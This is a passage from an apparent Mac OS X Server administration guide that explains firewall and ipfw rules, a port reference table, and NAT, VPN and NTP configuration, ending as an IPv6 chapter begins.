11 Deselect “SMTP Mail” in the right pane to disable mail transfer.
12 Click Save.
Allow a Customer to Access the Apple File Server
This section shows you, as an example, how to allow a customer with an IP address of
10.221.41.33 to access an Apple file server.
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Disable “Apple File Service” in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
Enter 10.221.41.33 as the address range to indicate the customer's address.
9 Click OK.
10 Select your newly created address group.
11 Select “Apple File Service” in the right pane to enable file access.
12 Click Save.
Important: Set up very specific address ranges in filters you create to block incoming
SMTP mail. For example, if you set a filter on port 25 to deny mail from all addresses,
you’ll prevent any mail from being delivered to your users.
Common Network Administration Tasks That Use
Firewall Service
Your firewall is the first line of defense against unauthorized network intruders,
malicious users, and network virus attacks. There are many ways that such attacks can
harm your data or use your network resources. This section lists a few of the common
uses of firewall service in network administration.
Preventing Denial-of-Service (DoS) Attacks
When the server receives a TCP connection request from a client to whom access is
denied, by default it sends a reply rejecting the connection. This stops the denied client
from resending over and over again. However, a malicious user can generate a series of
TCP connection requests from a denied IP address and force the server to keep
replying, locking out others trying to connect to the server. This is one type of Denial-
of-Service attack.
To prevent ping denial-of-service attacks:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Deselect “ICMP Echo (ping) reply.”
6 Click Save.
Controlling or Enabling Peer-to-Peer Network Usage
Sometimes network administrators need to control the use of Peer-to-Peer (P2P) file
sharing applications. Such applications might use network bandwidth and resources
inappropriately or disproportionately. P2P file sharing might also pose a security or
intellectual property risk for a business.
You can cut off P2P networking by blocking all traffic incoming and outgoing on the
port number used by the P2P application. You’ll have to determine the port used for
each P2P network in question. By default, Mac OS X Server’s firewall blocks all ports not
specifically opened.
You can choose to limit P2P network usage to IP addresses behind the firewall. To do
so, you’ll need to open the P2P port for your LAN interface, but continue to block the
port on the interface connected to the Internet (WAN interface). To learn how to make
a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on page 51.
Important: Denial-of-Service attacks are somewhat rare, so make these settings only
if you think your server may be vulnerable to an attack. If you deny ICMP echo replies,
services that use ping to locate network services will be unable to detect your server.
Controlling or Enabling Network Game Usage
Sometimes network administrators need to control the use of network games. The
games might use network bandwidth and resources inappropriately or
disproportionately.
You can cut off network gaming by blocking all traffic incoming and outgoing on the
port number used by the game. You’ll have to determine the port used for each
network game in question. By default, Mac OS X Server’s firewall blocks all ports not
specifically opened.
You can choose to limit network game usage to IP addresses behind the firewall. To do
so, you’ll need to open the appropriate port on your LAN interface, but continue to
block the port on the interface connected to the Internet (WAN interface). Some games
require a connection to a gaming service for play, so this may not be effective. To learn
how to make a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on
page 51.
You can open the firewall to certain games, allowing network games to connect to
other players and game services outside the firewall. To do this, you’ll need to open up
the appropriate port on your LAN and WAN interface. Some games require more than
one port to be open. Consult the game’s documentation for networking details. To
learn how to make a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on
page 51.
Advanced Configuration
You might prefer to use a command-line interface and conventional configuration file
to configure Mac OS X Server’s firewall service. For example, you might have an existing
ipfw configuration file that you want to migrate to a new Mac OS X Server installation.
Alternately, you might need greater control of the firewall for troubleshooting or
intrusion detection.
Background
When you click the Save button in Server Admin, all the old rules are flushed and new
rules are loaded and apply immediately. This happens whether the IP firewall service is
started or stopped. If the IP firewall service is running, it is stopped long enough to
reload the rules, and it automatically restarts. The new rules are loaded from three
sources:
• The rules from both the General and the Advanced panels (stored in /etc/ipfilter/
ip_address_groups.plist).
• The manually configured ipfw rules, if any (stored in /etc/ipfilter/ipfw.conf).
• The NAT divert rule, if the NAT service is running.
If you want to put your own rules in the ipfw.conf file, you can use a template that is
installed at /etc/ipfilter/ipfw.conf.default. Duplicate the file, rename it, and edit it as
indicated in the template’s comments.
Precautions
By using the Advanced panel or creating your own rules, you can put the server in a
state that is completely cut off from network access. This might require a reboot in
single-user-mode to restore network access. To avoid this, consider adding a cron job to
disable the firewall periodically while you are testing rules. Be sure to disable this cron
job when the machine is put into production.
The following command disables the firewall:
sudo sysctl -w net.inet.ip.fw.enable=0
And this enables it:
sudo sysctl -w net.inet.ip.fw.enable=1
Neither of these operations changes the rules loaded into the firewall; they only determine whether those rules are applied.
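The safety cron job mentioned above can be a single crontab line; the 15-minute interval and the sysctl path shown here are illustrative and should be adjusted for your system:

```shell
# /etc/crontab entry (illustrative): while testing rules, disable the
# firewall every 15 minutes so a bad rule can't lock you out permanently.
# Remove this line before the machine goes into production.
*/15 * * * * root /usr/sbin/sysctl -w net.inet.ip.fw.enable=0
```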
Creating IP Filter Rules Using ipfw
You can use the ipfw command in conjunction with the firewall module of Server
Admin when you want to:
• Display rules created by the firewall module. Each filter translates into one or more
rules.
• Create filters with characteristics that can’t be defined using the firewall module. For
example, you may want to use rules specific to a particular kind of IP protocol. Or you
may want to filter or block outgoing packets.
• Count the number of times rules are applied.
If you use ipfw, make sure you don’t modify rules created using the firewall module.
Changes you make to firewall module rules are not permanent. Firewall service
recreates any rules defined using the firewall module whenever the service is restarted.
Here is a summary of how the firewall module assigns rule numbers:
Rule number   Used by firewall module for
10            Loopback.
20            Discarding any packet from or to 127.0.0.0/8.
30            Discarding any packet from 224.0.0.0/3 (multicast).
40            Discarding TCP packets to 224.0.0.0/3 (multicast).
100–64000     User-defined port-specific filters.
63200         Denying access for ICMP echo reply. Created when "Deny ICMP echo reply" is selected in the Advanced pane of the Configure Firewall window.
Reviewing IP Filter Rules
To review the rules currently defined for your server, use the Terminal application to
submit the ipfw show command. The show command displays four columns of
information:
When you type:
ipfw show
You will see information similar to this:
0010    260   32688   allow log ip from any to any via lo*
0020      0       0   deny log ip from 127.0.0.0/8 to any in
0020      0       0   deny log ip from any to 127.0.0.0/8 in
0030      0       0   deny log ip from 224.0.0.0/3 to any in
0040      0       0   deny log tcp from any to 224.0.0.0/3 in
01000     1      52   allow log tcp from 111.222.33.3 to 111.222.31.3 660 in
...
Creating IP Filter Rules
To create new rules, use the ipfw add command. The following example defines rule
200, a filter that prevents TCP packets from a client with IP address 10.123.123.123 from
accessing port 80 of the system with IP address 17.123.123.123:
ipfw add 200 deny tcp from 10.123.123.123 to 17.123.123.123 80
Rule number   Used by firewall module for (continued)
63300         Denying access for IGMP. Created when Deny IGMP is selected in the Advanced pane of the Configure Firewall window.
63400         Allowing any TCP or UDP packet to access port 111 (needed by NetInfo). Created when a shared NetInfo domain is found on the server.
63500         Allowing user-specified TCP and UDP packets to access ports needed for NetInfo shared domains. You can configure NetInfo to use a static port or to dynamically select a port from 600 through 1023. Then use the Configure Firewall window to allow all or specific clients to access those ports.
64000–65000   User-defined filters for Default.
The four columns in the ipfw show output are:

Column   Information
1        The rule number. The lower the number, the higher the priority of the rule.
2        The number of times the filter has been applied since it was defined.
3        The number of bytes to which the filter has been applied.
4        A description of the rule.
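Because the lowest-numbered matching rule wins, the firewall effectively performs a first-match scan of the rule list. This toy shell sketch (the rule set is invented for illustration and only matches on a single port field) mimics that selection:

```shell
# First-match semantics: scan rules in ascending number order; the first
# rule whose port pattern matches the packet decides its fate.
match() {                          # match PORT
  while read num action port; do
    if [ "$port" = any ] || [ "$port" = "$1" ]; then
      echo "rule $num -> $action"
      return
    fi
  done <<'EOF'
00100 allow 515
00200 deny 80
65535 allow any
EOF
}

match 80    # rule 00200 -> deny
match 22    # no specific rule matches, so the catch-all rule 65535 applies
```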
Deleting IP Filter Rules
To delete a rule, use the ipfw delete command. This example deletes rule 200:
ipfw delete 200
For more information, consult the man pages for ipfw.
Port Reference
The following tables show the TCP and UDP port numbers commonly used by
Mac OS X computers and Mac OS X Servers. These ports can be used when you’re
setting up your IP filters. See the website www.faqs.org/rfcs to view the RFCs
referenced in the tables.
TCP port   Used for                                            Reference
7          echo                                                RFC 792
20         FTP data                                            RFC 959
21         FTP control                                         RFC 959
22         ssh (secure shell)
23         Telnet                                              RFC 854
25         SMTP (email)                                        RFC 821
53         DNS                                                 RFC 1034
79         Finger                                              RFC 1288
80         HTTP (Web)                                          RFC 2068
88         Kerberos                                            RFC 1510
106        Open Directory Password Server (along with 3659)
110        POP3 (email)                                        RFC 1081
111        Remote Procedure Call (RPC)                         RFC 1057
113        AUTH                                                RFC 931
115        sftp
119        NNTP (news)                                         RFC 977
123        Network Time Server synchronization (NTP)           RFC 1305
137        Windows Names
138        Windows Browser
139        Windows file and print (SMB)                        RFC 100
143        IMAP (email access)                                 RFC 2060
311        AppleShare IP remote Web administration, Server Monitor, Server Admin (servermgrd), Workgroup Manager (DirectoryService)
389        LDAP (directory), Sherlock 2 LDAP search            RFC 2251
427        SLP (service location)
443        SSL (HTTPS)
514        shell
515        LPR (printing)                                      RFC 1179
532        netnews
548        AFP (AppleShare)
554        Real-Time Streaming Protocol (QTSS)                 RFC 2326
600–1023   Mac OS X RPC-based services (for example, NetInfo)
625        Remote Directory Access
626        IMAP Administration (Mac OS X mail service and AppleShare IP 6.x mail)
636        LDAP SSL
660        Server Settings, Server Manager
687        AppleShare IP Shared Users and Groups, Server Monitor, Server Admin (servermgrd)
749        Kerberos administration using the kadmind command-line tool
1220       QTSS Admin
1694       IP Failover
1723       PPTP VPN                                            RFC 2637
2049       NFS
2236       Macintosh Manager
3031       Program Linking
3659       Open Directory Password Server (along with 106)
7070       Real-Time Streaming Protocol (QTSS)
8000–8999  Web service
16080      Web service with performance cache
UDP port   Used for                                            Reference
7          echo
53         DNS
67         DHCP server (BootP)
68         DHCP client
69         Trivial File Transfer Protocol (TFTP)
111        Remote Procedure Call (RPC)
123        Network Time Protocol                               RFC 1305
137        Windows Name Service (WINS)
138        Windows Datagram Service
161        Simple Network Management Protocol (SNMP)
427        SLP (service location)
497        Retrospect
513        who
514        Syslog
554        Real-Time Streaming Protocol (QTSS)
600–1023   Mac OS X RPC-based services (for example, NetInfo)
985        NetInfo (when a shared domain is created using NetInfo Domain Setup)
2049       Network File System (NFS)
3031       Program Linking
3283       Apple Network Assistant, Apple Remote Desktop
5353       Rendezvous (mDNSResponder)
6970 and up  QTSS
7070       Real-Time Streaming Protocol alternate (QTSS)
Where to Find More Information
For more information about ipfw:
You can find more information about ipfw, the process which controls IP firewall
service, by accessing its man page. It explains how to access its features and implement
them. To access the man page use the Terminal application to enter:
man ipfw
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs. The “Port Reference” section contains several
RFC numbers for various protocols.
Additionally, important multicast addresses are documented in the most recent
Assigned Numbers RFC, currently RFC 1700.
4 NAT Service
Network Address Translation (NAT) is sometimes referred to as IP masquerading or IP aliasing. NAT is used to allow multiple computers access to the Internet with only one assigned IP address. NAT allows you to create a private network that accesses the Internet through a NAT router or gateway.
The NAT router takes all the traffic from your private network and remembers which internal address made each request. When the NAT router receives the response to a request, it forwards it to the originating computer. Traffic that originates from the Internet does not reach any of the computers behind the NAT router unless port forwarding is enabled.
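The mapping the NAT router maintains between internal requests and its public address can be sketched as a toy translation table (the public address and port numbers here are invented):

```shell
# Toy NAT table: each new internal ip:port pair is assigned a unique
# external port on the router's public address; repeat traffic from the
# same pair reuses its existing mapping, so replies can be routed back.
awk '
BEGIN { public = "203.0.113.1"; next_port = 40000 }
{
  key = $1                                   # internal "ip:port"
  if (!(key in map)) map[key] = public ":" next_port++
  printf "%s -> %s\n", key, map[key]
}' <<'EOF'
192.168.1.20:51515
192.168.1.21:49152
192.168.1.20:51515
EOF
```

The first and third lines map to the same external port, while the second gets a fresh one; a real NAT implementation such as natd additionally tracks protocol state and expires idle mappings.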
Enabling NAT on Mac OS X Server requires detailed control over DHCP, so DHCP is
configured separately in Server Admin. To learn more about DHCP, see Chapter 1,
“DHCP Service,” on page 7.
Enabling NAT also automatically creates a divert rule to the Firewall configuration.
Starting and Stopping NAT Service
You use Server Admin to start and stop NAT service on your default network interface.
Starting NAT service also starts DHCP for the default interface.
To start NAT service:
1 In Server Admin, select NAT from the Computers & Services pane.
2 Click Start Service.
When the service is running, Stop Service becomes available.
Configuring NAT Service
You use Server Admin to indicate which network interface is connected to the Internet
or other external network.
To configure NAT service:
1 In Server Admin, select NAT from the Computers & Services pane.
2 Click Settings.
3 Choose the network interface from the “Share your connection from:” pop-up menu.
This interface should be the one that connects to the Internet or external network.
4 Click Save.
Monitoring NAT Service
You might want to monitor your NAT service for troubleshooting and security. This
section describes the NAT status overview and monitoring NAT divert activity.
Viewing the NAT Status Overview
The NAT status overview allows you to see if the service is running, and how many
protocol links are active.
To see the overview:
1 In Server Admin, choose NAT Service from the Computers & Services list.
2 Click the Overview button.
Viewing NAT Activity
When the NAT service is running, it creates a packet divert filter in the IP Firewall
service. You can view NAT packet divert events which have been logged by the firewall
service. The logs are useful for network troubleshooting and configuration. To
troubleshoot NAT, you should create the rule manually and enable logging for the
packets allowed by the rule.
To view the NAT divert log:
1 In the Terminal application enter:
ipfw add 10 divert natd all from any to any via <interface>
Where <interface> is the network interface selected in the NAT section of
Server Admin.
2 In Server Admin, choose Firewall from the Computers & Services list.
3 Click Settings.
4 Select the Advanced tab.
5 Select the rule that was just created.
6 Click the Edit button.
7 Choose to log packets that match the filter.
8 Click OK.
9 In Server Admin, choose NAT Service from the Computers & Services list.
10 Click Settings.
11 Click Logging.
12 Enable logging.
13 Click Save.
14 Click the Log button to view the log.
Where to Find More Information
For more information about natd:
You can find more information about natd, the daemon process which controls NAT
service, by accessing its man page. It explains how to access its features and implement
them. To access the man page use the Terminal application to enter:
man natd
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
For NAT descriptions, see RFC 1631 and RFC 3022.
5 VPN Service
A Virtual Private Network (VPN) consists of two or more computers or networks (nodes) connected by a private link over which data is encrypted. This link simulates a local connection, as if the remote computer were attached to the local area network (LAN).
VPNs allow users at home or otherwise away from the LAN to securely connect to it
using any network connection, such as the Internet. From the user’s perspective, the
VPN connection appears as a dedicated private link.
VPN technology also allows an organization to connect branch offices over the
Internet, while maintaining secure communications. The VPN connection across the
Internet acts as a wide area network (WAN) link between the sites.
VPNs have several advantages for organizations whose computer resources are
physically separated. For example, each remote user or node uses the network
resources of its Internet Service Provider (ISP) rather than having a direct, wired link to
the main location. VPNs also allow verified mobile users to access private computer
resources (file servers, etc.) from any connection to the Internet. Finally, VPN can link
multiple LANs together over great distances using existing Internet infrastructure.
This chapter describes VPN authentication method, transport protocols, and how to
configure, manage, and monitor VPN service. It does not include instructions for
configuring VPN clients for use of your VPN server.
VPN and Security
VPNs provide security through strong authentication of identity and encrypted transport of data between the nodes, ensuring data privacy and integrity. The following section contains information about each supported transport and authentication method.
Authentication Method
Mac OS X Server VPN uses Microsoft's Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2) for authentication; it is also the standard Windows authentication scheme for VPN. This method encodes passwords when they're sent over the network and stores them in a scrambled form on the server, offering good security during network transmission.
This authentication method is the default and available for both transport protocols
described in the following section.
Mac OS X Server supports several authentication methods. Each has its own strengths
and requirements. It is not possible to choose your authentication method using Server
Admin. If you need to configure a different authentication scheme from the default (for
example, to use RSA Security’s SecurID authentication), you’ll need to edit the VPN
configuration file manually. The configuration file is located at:
/Library/Preferences/SystemConfiguration/com.apple.RemoteAccessServers.plist
Transport Protocols
You’ll be able to enable either or both of the encrypted transport protocols. Each has
its own strengths and requirements.
Point to Point Tunneling Protocol (PPTP)
PPTP is the Windows standard VPN protocol. PPTP offers good encryption and supports
a number of authentication schemes. It uses the user-provided password to produce an
encryption key. You can also allow 40-bit (weak) security encryption in addition to the
default 128-bit (strong) encryption if needed by your VPN clients.
PPTP is necessary if you have Windows or Mac OS X 10.2.x clients.
Layer Two Tunneling Protocol over Secure Internet Protocol (L2TP/IPSec)
L2TP/IPSec uses strong IPSec encryption to “tunnel” data to and from the network nodes. It is essentially a combination of Cisco’s L2F and PPTP. IPSec requires Security Certificates from a Certificate Authority like Verisign, or a predefined shared secret between connecting nodes. The shared secret must be entered on the server as well as on each client. It is not a password for authentication; rather, it is used to generate the encryption keys that establish secure tunnels between nodes.
Before You Set Up VPN Service
Before setting up Virtual Private Network (VPN) service, you need to determine which
transport protocol you’re going to use. The table below shows which protocols are
supported by different platforms.
If you’re using L2TP, you need to have a Security Certificate from a Certificate Authority
like Verisign, or a pre-defined shared secret between connecting nodes. If you choose a
shared secret, it needs to be secure as well (8-12+ alphanumeric characters with
punctuation) and kept secret by the users.
If you’re using PPTP, you need to make sure all of your clients support 128-bit PPTP
connections, for greatest transport security. Be aware that enabling 40-bit transport
security is a serious security risk.
Managing VPN Service
This section describes tasks associated with managing VPN service. It includes starting,
stopping, and configuring the service.
Starting or Stopping VPN Service
You use Server Admin to start and stop VPN service.
To start or stop VPN service:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Make sure at least one of the transport protocols is checked and configured.
3 Click Start Service or Stop Service.
When the service is turned on, the Stop Service button is available.
Enabling and Configuring L2TP Transport Protocol
Use Server Admin to designate L2TP as the transport protocol. If you enable this protocol, you must also configure the connection settings: an IPSec shared secret (if you don’t use a Certificate Authority’s Security Certificate), the IP address allocation range to be given to your clients, and, if desired, the group to be allowed VPN privileges. If both L2TP and PPTP are used, each protocol should have a separate, non-overlapping address range.
If you have...             you can use L2TP/IPSec    you can use PPTP
Mac OS X 10.3.x clients    X                         X
Mac OS X 10.2.x clients                              X
Windows clients            X (if Windows XP)         X
Linux or Unix clients      X                         X
To enable L2TP:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select L2TP.
5 Enter the shared secret.
6 Set the beginning IP address of the allocation range.
7 Set the ending IP address of the allocation range.
8 Enter the group that has access to VPN login.
You can use the Users & Groups button to browse for a group.
If you leave this blank, all workgroups will have access to VPN login.
9 Click Save.
Enabling and Configuring PPTP Transport Protocol
Use Server Admin to designate PPTP as the transport protocol. By enabling this
protocol, you must also configure the connection settings. You should designate an
encryption key length (40-bit in addition to 128-bit), the IP address allocation range to
be given to your clients, and group to be allowed VPN priviledges (if desired). If both
L2TP and PPTP are used, each protocol should have a separate, non-overlapping
address range.
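Because overlapping L2TP and PPTP ranges lead to address conflicts, it can be worth checking candidate ranges before entering them. A minimal shell sketch of such a check; the example ranges are hypothetical, not taken from this guide:

```shell
#!/bin/sh
# Convert a dotted-quad IPv4 address to a 32-bit integer.
ip2int() {
  set -- $(echo "$1" | tr '.' ' ')
  echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# ranges_overlap START1 END1 START2 END2 -> prints "overlap" or "ok".
# Two inclusive ranges overlap when each range starts before the other ends.
ranges_overlap() {
  s1=$(ip2int "$1"); e1=$(ip2int "$2")
  s2=$(ip2int "$3"); e2=$(ip2int "$4")
  if [ "$s1" -le "$e2" ] && [ "$s2" -le "$e1" ]; then
    echo overlap
  else
    echo ok
  fi
}

# Hypothetical L2TP and PPTP allocation ranges:
ranges_overlap 192.168.100.1 192.168.100.127 192.168.100.128 192.168.100.254
```

If the two ranges touch anywhere, the check prints "overlap" and one of them should be adjusted before saving the settings.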
To enable PPTP:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select PPTP.
5 If desired, select “Allow 40-bit encryption keys” to allow such keys to be used in
addition to 128-bit keys.
6 Set the beginning and ending IP addresses of the allocation range.
7 Enter the group that has access to VPN login.
You can use the Users & Groups button to browse for a group.
If you leave this blank, all workgroups will have access to VPN login.
8 Click Save.
Warning: Allowing 40-bit encryption keys is less secure, but may be necessary for
some VPN client applications.
Configuring Additional Network Settings for VPN Clients
When a user connects to your server through VPN, that user is given an IP address
from your allocated range. If this range is not served by a DHCP server, you’ll need to
configure additional network settings. These settings include the network mask, DNS
address, and search domains.
To configure additional network settings:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Client Information tab.
4 Enter the network mask for your allocated IP address range.
5 Enter the IP address of the DNS server.
6 Enter any search domains, as needed.
7 Click Save.
Configuring VPN Network Routing Definitions
Network routing definitions allow you to route data to or from specific addresses
either through the VPN tunnel or over the unsecured network. For example, you may
want all traffic addressed to the LAN IP address range to go through the secure tunnel
to the LAN, but have all traffic to other addresses routed through the user’s normal,
unsecured Internet connection. This gives you finer control over what goes through
the VPN tunnel.
The definitions are unordered; only the definition that most closely matches the
packet being routed is applied.
To set routing definitions:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Client Information tab.
4 Click the Add button below the routing definition list.
5 Enter the address range of the packets to be routed.
6 Enter the network mask of the address range to be routed.
7 Select the routing destination from the pop-up menu.
Private means to route it through the VPN tunnel.
Public means to use the normal interface with no tunnel.
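The “most closely matches” behavior described above amounts to selecting the definition with the most specific network mask. A rough sketch of that selection in shell; the two definitions (17.0.0.0/8 routed Private, 17.1.2.0/24 routed Public) are hypothetical examples, not values from this guide:

```shell
#!/bin/sh
# Convert a dotted-quad IPv4 address to a 32-bit integer.
ip2int() {
  set -- $(echo "$1" | tr '.' ' ')
  echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# route_for ADDR -- print the destination (Private or Public) of the
# definition whose mask matches ADDR most specifically.
route_for() {
  addr=$(ip2int "$1")
  best_mask=-1
  best_dest=Public            # default when no definition matches
  while read -r net mask dest; do
    n=$(ip2int "$net"); m=$(ip2int "$mask")
    # a definition matches when ADDR masked equals its network address
    if [ $(( addr & m )) -eq $(( n & m )) ] && [ "$m" -gt "$best_mask" ]; then
      best_mask=$m
      best_dest=$dest
    fi
  done <<EOF
17.0.0.0   255.0.0.0       Private
17.1.2.0   255.255.255.0   Public
EOF
  echo "$best_dest"
}

route_for 17.1.2.9   # both definitions match; the /24 wins -> Public
route_for 17.5.5.5   # only the /8 definition matches -> Private
```

Here traffic to most of 17.0.0.0/8 goes through the tunnel, while the one /24 subnet is carved out to travel over the normal interface.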
Monitoring VPN Service
This section describes tasks associated with monitoring a functioning VPN service. It
includes accessing status reports, setting logging options, viewing logs, and
monitoring connections.
Viewing a VPN Status Overview
The VPN Overview gives you a quick status report on your enabled VPN services. It tells
you how many L2TP and PPTP clients you have connected, which authentication
method is selected, and when the service was started.
To view the overview:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click the Overview button.
Setting the Log Detail Level for VPN Service
You can choose the level of detail you want to log for VPN service.
• Non-verbose will indicate conditions for which you need to take immediate action
(for example, if the VPN service can’t start up).
• Verbose will record all activity by the VPN service, including routine functions.
Non-verbose logging is enabled by default.
To set VPN log detail:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select Verbose to enable verbose logging, if desired.
5 Click Save.
Setting the VPN Log Archive Interval
Mac OS X Server can automatically archive VPN service logs after a certain amount of
time. Each archive log is compressed and uses less disk space than the original log file.
You can customize the schedule to archive the logs after a set period of time, measured
in days.
To set up the log archive interval:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select “Archive Log every ___ days”
5 Enter the log archive rollover interval you want.
6 Click Save.
Viewing the VPN Log
You’ll need to monitor VPN logs to ensure smooth operation of your Virtual Private
Network. The VPN logs can help you troubleshoot problems.
To view the log:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Logs.
Viewing VPN Client Connections
You can monitor VPN client connections to ensure secure access to the Virtual Private
Network. The client connection screen allows you to see the connected user, the IP
address that user is connecting from, the IP address assigned by your network, and the
type and duration of the connection.
You can sort the list by clicking on the column headers.
To view client connections:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Connections.
Where to Find More Information
For more information about L2TP/IPSec:
The Internet Engineering Task Force (IETF) is working on formal standards for L2TP/
IPsec user authentication. See the website www.ietf.org/ids.by.wg/ipsec.html for more
information.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
• For L2TP description, see RFC 2661.
• For PPTP description, see RFC 2637.
6 NTP Service
Network Time Protocol (NTP) is a network protocol used to synchronize the clocks of
computers on your network to a time reference clock. NTP is used to ensure that all the
computers on a network are reporting the same time.
If an isolated network, or even a single computer, is running on the wrong time, services
that use time and date stamps (like mail service, or web service with timed cookies) will
send wrong time and date stamps and be out of synchronization with other computers
across the Internet. For example, an email message could arrive minutes or years before
it was sent (according to the time stamp), and a reply to that message could come
before the original was sent.
How NTP Works
NTP uses Universal Time Coordinated (UTC) as its reference time. UTC is based on an
atomic resonance, and clocks that run according to UTC are often called “atomic
clocks.”
Internet-wide, authoritative NTP servers (called Stratum 1 servers) keep track of the
current UTC time. Other subordinate servers (called Stratum 2 and 3 servers) query the
Stratum 1 servers on a regular basis and estimate the time taken across the network to
send and receive the query. They then factor this estimate with the query result to set
the Stratum 2 or 3 server’s own time. The estimates are accurate to the nanosecond.
Your local time server can then query the Stratum 2 or 3 servers for the time, repeating
the same process. An NTP client computer on your network then takes the UTC time
reference and converts it, through its own time zone setting, to local time and sets its
internal clock accordingly.
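The last step — rendering the UTC reference through the client’s time zone setting — can be illustrated with date(1). This sketch assumes GNU date syntax (`-d @EPOCH`); BSD and Mac OS X date use `-r EPOCH` instead:

```shell
#!/bin/sh
# The same UTC instant, rendered through two different time zone settings.
EPOCH=0   # the UTC reference instant: 1970-01-01 00:00:00 UTC

TZ=UTC              date -d "@$EPOCH" '+%Y-%m-%d %H:%M %Z'
TZ=America/New_York date -d "@$EPOCH" '+%Y-%m-%d %H:%M %Z'
```

Both lines describe the identical moment; only the local rendering differs, which is exactly what an NTP client does with the time it receives.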
Using NTP on Your Network
Mac OS X Server can act not only as an NTP client, receiving authoritative time from
an Internet time server, but also as an authoritative time server for a network. Your local
clients can query your server to set their clocks. If you set your server to answer time
queries, you should also set it to query an authoritative server on the Internet.
Setting Up NTP Service
If you choose to run NTP service on your network, make sure your designated server
can access a higher-authority time server. Apple provides a Stratum 2 time server for
customer use at time.apple.com.
Additionally, you’ll need to make sure your firewall allows NTP queries out to an
authoritative time server on UDP port 123, and incoming queries from local clients on
the same port. See Chapter 3, “IP Firewall Service,” on page 43 for more information on
configuring your firewall.
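On a server where the firewall is managed by hand with ipfw, rules along the following lines would permit that NTP traffic. This is only a sketch — the rule numbers are arbitrary, and in practice you would configure this through Server Admin’s firewall settings (Chapter 3) rather than by entering raw rules:

```shell
# Allow outgoing NTP queries to an upstream time server (UDP port 123)
ipfw add 2000 allow udp from any to any 123 out
# Allow replies from upstream servers and queries from local clients
ipfw add 2010 allow udp from any 123 to any in
```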
To set up NTP service:
1 Make sure your server is configured to “Set Date & Time automatically.”
This setting is in the Date & Time pane of System Preferences, or the Server Admin
Settings pane for the server.
2 Open Server Admin, and select the server you want to act as a time server.
3 Click Settings.
4 Select the Advanced tab.
5 Select Enable NTP.
6 Click Save.
Configuring NTP on Clients
If you have set up a local time server, you can configure your clients to query it for the
network date and time. By default, clients query Apple’s time server. The following
instructions set your clients to query your own time server instead.
To configure NTP on clients:
1 Open System Preferences.
2 Click Date & Time.
3 Select the Network Time tab.
4 Select “Set Date & Time automatically.”
5 Select and delete the text in the field rather than use the pop-up menu.
6 Enter the host name of your time server.
Your host name can be either a domain name (like time.example.com) or an IP address.
7 Quit System Preferences.
Where to Find More Information
The NTP working group, documentation, and an F.A.Q. for NTP can be found at the
website www.ntp.org.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
The official specification of NTP version 3 is RFC 1305.
7 IPv6 Support
IPv6 is short for “Internet Protocol Version 6.” IPv6 is the Internet’s next-generation
protocol, designed to replace the current Internet Protocol, IP Version 4 (IPv4, or just IP).
The current Internet Protocol is beginning to have problems coping with the growth
and popularity of the Internet. IPv4’s main problems are:
• Limited IP addressing.
IPv4 addresses are 32 bits, meaning there can be only about 4,300,000,000 network
addresses.
• Increased routing and configuration burden.
The amount of network overhead, memory, and time to route IPv4 information is
rapidly increasing with each new computer connected to the Internet.
• End-to-end communication is routinely circumvented.
This problem is an outgrowth of the IPv4 addressing problem. As the number of
computers increases and address shortages become more acute, another addressing
and routing service, Network Address Translation (NAT), has been developed to
mediate between and separate the two network end points. This frustrates a number
of network services and is limiting.
IPv6 fixes some of these problems and mitigates others. It adds improvements in areas
such as routing and network auto-configuration. It increases the number of network
addresses to over 3 × 10^38 and eliminates the need for NAT. IPv6 is expected to
gradually replace IPv4 over a number of years, with the two coexisting during the
transition.
This chapter lists the IPv6 enabled services used by Mac OS X Server, gives guidelines
for using the IPv6 addresses in those services, and explains IPv6 address types and
notation.
IPv6 Enabled Services
The following services in Mac OS X Server support IPv6 in addressing:
• DNS (BIND)
• IP Firewall
• Mail (POP/IMAP/SMTP)
• SMB
• Web (Apache 2)
Additionally, a number of command-line tools installed with Mac OS X Server support
IPv6 (for example, ping6 and traceroute6).
IPv6 Addresses in Server Admin
The services above don’t support IPv6 addresses in the user interface. They can be
configured with command-line tools to add IPv6 addresses, but those same addresses
